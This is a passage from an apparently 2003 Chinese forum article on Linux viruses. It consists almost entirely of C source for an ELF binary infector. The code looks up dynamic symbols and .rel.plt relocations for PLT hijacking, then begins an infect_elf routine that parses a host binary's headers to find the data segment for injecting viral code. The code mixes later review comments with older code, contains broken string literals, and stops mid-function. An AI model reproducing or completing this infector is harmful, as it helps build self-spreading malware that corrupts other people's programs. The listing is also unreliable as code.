
Linux系统下病毒的研究

天极论坛 2003-09-09 17:04 我要吐槽
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdrp->sh_type == SHT_DYNSYM) {
return do_dyn_symtab(fd, shdr, shdrp, sh_function);
}

++shdrp;
}
}

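/*
 * Look up the relocation entry that refers to dynamic symbol index `sym`
 * inside the relocation section described by `shdr`.
 *
 * plt    - out: r_offset of the matching entry, or -1 when none matches.
 * offset - out: zero-based index of the matching entry within the section,
 *          or -1 when none matches.
 * fd     - descriptor of the ELF file; its file position is moved.
 * shdr   - header of the relocation section to scan (sh_offset, sh_size).
 * sym    - symbol table index to search for.
 *
 * Any allocation, seek or read failure prints a message and exits with
 * status 1, as the rest of this listing does.
 *
 * sh_offset and sh_size are taken from the file as-is. They are not checked
 * against the real file length here; a short read is the only thing that
 * catches a section header pointing past the end of the file.
 */
void do_rel(int *plt, int *offset, int fd, Elf32_Shdr *shdr, int sym)
{
    /* Only whole entries are considered, so a section size that is not a
     * multiple of sizeof(Elf32_Rel) can no longer cause a read past the
     * end of the buffer on the last iteration. */
    const size_t entry_count = shdr->sh_size / sizeof(Elf32_Rel);
    const size_t table_bytes = entry_count * sizeof(Elf32_Rel);
    Elf32_Rel *rel;
    size_t i;

    /* Start from "not found" so every return path leaves defined outputs. */
    *plt = -1;
    *offset = -1;

    /* An empty section has nothing to match; also avoids malloc(0). */
    if (entry_count == 0) {
        return;
    }

    rel = malloc(table_bytes);
    if (rel == NULL) {
        perror("malloc");
        exit(1);
    }

    if (lseek(fd, (off_t)shdr->sh_offset, SEEK_SET) != (off_t)shdr->sh_offset) {
        perror("lseek");
        exit(1);
    }

    if (read(fd, rel, table_bytes) != (ssize_t)table_bytes) {
        perror("read");
        exit(1);
    }

    for (i = 0; i < entry_count; i++) {
        if (ELF32_R_SYM(rel[i].r_info) == (Elf32_Word)sym) {
            *plt = (int)rel[i].r_offset;
            *offset = (int)i;
            printf("offset %i\n", *offset);
            break;
        }
    }

    /* The table is only needed for the scan; the original never released it. */
    free(rel);
}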

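/*
 * Resolve `sh_function` to its dynamic symbol index and look that index up
 * in the ".rel.plt" section of the file.
 *
 * plt, offset - out: filled in by do_rel() on a match; both are -1 when the
 *               symbol is unknown, when the file has no ".rel.plt" section,
 *               or when no relocation entry refers to the symbol.
 * fd          - descriptor of the ELF file.
 * string      - section-name string table contents.
 * ehdr        - ELF header (e_shnum bounds the section scan).
 * shdr        - array of e_shnum section headers.
 * sh_function - name of the dynamic function to look for.
 *
 * NOTE(review): sh_name is used as an index into `string` without a bound,
 * because the table's length is not passed to this function. A crafted
 * sh_name can therefore make strcmp() read outside the buffer; the caller
 * would have to validate it against the string table size.
 */
void find_rel(
    int *plt,
    int *offset,
    int fd,
    const char *string,
    Elf32_Ehdr *ehdr, Elf32_Shdr *shdr,
    const char *sh_function
)
{
    int sym;
    int i;

    /* Default to "not found". The original left both outputs untouched when
     * no ".rel.plt" section existed, so the caller tested an uninitialised
     * value. */
    *plt = -1;
    *offset = -1;

    sym = get_sym_number(fd, ehdr, shdr, sh_function);
    if (sym < 0) {
        return;
    }

    for (i = 0; i < ehdr->e_shnum; i++) {
        if (strcmp(&string[shdr[i].sh_name], ".rel.plt") == 0) {
            do_rel(plt, offset, fd, &shdr[i], sym);
            return;
        }
    }
}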

void infect_elf(
char *host,
char *(*get_virus)(void),
int (*init_virus)(int, int, int, int, int, int),
int len,
const char *sh_function
)

{
Elf32_Ehdr ehdr;
Elf32_Shdr *shdr, *strtabhdr;
Elf32_Phdr *phdr;
char *pdata, *sdata;
int move = 0;
int od, fd;
int evaddr, text_start = -1, plt;
int sym_offset;
int bss_len, addlen;
int offset, pos, oshoff;
int plen, slen;
int i;
char null = 0;
struct stat stat;
char *string;
char tempname[8] = "vXXXXXX";

fd = open(host, O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}

/* read the ehdr */

if (read(fd, &ehdr, sizeof(ehdr)) < 0) {
perror("read");
exit(1);
}

do_elf_checks(&ehdr);

/* modify the virus so that it knows the correct reentry point */

printf("host entry point: %x
", ehdr.e_entry);

/* allocate memory for phdr tables */

pdata = (char *)malloc(plen = sizeof(*phdr)*ehdr.e_phnum);
if (pdata == NULL) {
perror("malloc");
exit(1);
}

/* read the phdr's */

if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {
perror("lseek");
exit(1);
}

if (read(fd, pdata, plen) != plen) {
perror("read");
exit(1);
}
phdr = (Elf32_Phdr *)pdata;

/* allocated memory if required to accomodate the shdr tables */

sdata = (char *)malloc(slen = sizeof(*shdr)*ehdr.e_shnum);
if (sdata == NULL) {
perror("malloc");
exit(1);
}

/* read the shdr's */

if (lseek(fd, oshoff = ehdr.e_shoff, SEEK_SET) < 0) {
perror("lseek");
exit(1);
}

if (read(fd, sdata, slen) != slen) {
perror("read");
exit(1);
}

strtabhdr = &((Elf32_Shdr *)sdata)[ehdr.e_shstrndx];

string = (char *)malloc(strtabhdr->sh_size);
if (string == NULL) {
perror("malloc");
exit(1);
}

if (lseek(
fd, strtabhdr->sh_offset, SEEK_SET
) != strtabhdr->sh_offset) {
perror("lseek");
exit(1);
}

if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
perror("read");
exit(1);
}

find_rel(
&plt, &sym_offset,
fd,
string,
&ehdr,
(Elf32_Shdr *)sdata,
sh_function
);
if (plt < 0) {
printf("No dynamic function: %s
", sh_function);
exit(1);
}

for (i = 0; i < ehdr.e_phnum; i++) {
if (phdr->p_type == PT_LOAD) {
if (phdr->p_offset == 0) {
text_start = phdr->p_vaddr;
} else {
if (text_start < 0) {
fprintf(stderr, "No text segment??
");
exit(1);
}

/* is this the data segment ? */
#ifdef DEBUG
printf("Found PT_LOAD segment...
");
printf(
"p_vaddr: 0x%x
"
"p_offset: %i
"
"p_filesz: %i
"
"p_memsz: %i
"
"
",
phdr->p_vaddr,
phdr->p_offset,
phdr->p_filesz,
phdr->p_memsz
);
#endif
offset = phdr->p_offset + phdr->p_filesz;
bss_len = phdr->p_memsz - phdr->p_filesz;
